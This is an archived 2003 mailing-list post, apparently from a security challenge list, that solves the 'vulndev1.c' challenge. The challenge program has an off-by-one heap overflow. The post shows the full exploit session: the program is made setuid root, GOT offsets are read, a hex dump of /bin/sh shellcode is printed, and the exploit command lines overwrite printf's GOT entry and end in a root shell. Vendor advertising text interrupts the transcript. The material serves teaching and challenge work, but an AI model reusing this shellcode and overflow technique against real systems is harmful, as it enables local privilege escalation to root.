Re: vulndev1.c solution (warning SPOILER)

Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further..

matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadams@securityfocus.com>
// Spot the error in this program.

#include <stdio.h>
#include <stdlib.h>

#define SIZE 252

int
main(int argc, char *argv[])
{

                                int i;
        char    *p1, *p2;
        char    *buf1 = malloc(SIZE);
        char    *buf2 = malloc(SIZE);

        if (argc != 3)
                exit(1);

        p1 = argv[1], p2 = argv[2];
printf("p1 is at %p\n", p1);  // DEBUG                          
        strncpy(buf2, p2, SIZE);
        for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
                buf1[i] = p1[i];
        free(buf1);
        free(buf2);
        return 0;

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c 
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1
matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1
matrix@overdose vuln-dev $ objdump -R ./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049654 R_386_GLOB_DAT    __gmon_start__
0804963c R_386_JUMP_SLOT   malloc
08049640 R_386_JUMP_SLOT   __libc_start_main
08049644 R_386_JUMP_SLOT   printf
08049648 R_386_JUMP_SLOT   exit

matrix@overdose vuln-dev $ pcalc 0x4c-12

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

        64 0x40 0y1000000 matrix@overdose vuln-dev $ od -ch shell
0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210

        c031 46b0 db31 c931 80cd 16eb 315b 88c0 0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f

        0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53 0000040 315 200 350 345 377 377 377 / b i n / s h

        80cd e5e8 ffff 2fff 6962 2f6e 6873 0000056
matrix@overdose vuln-dev $ wc -c shell

     46 shell
matrix@overdose vuln-dev $ pcalc 252-46

        206 0xce 0y11001110 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"` p1 is at 0xbffff839
Segmentation fault
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"` p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b#

questions? comments? >=)

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-
application/pgp-signature attachment: stored
Received on Wed May 14 00:35:20 2003
Do you need more help?
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:
Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek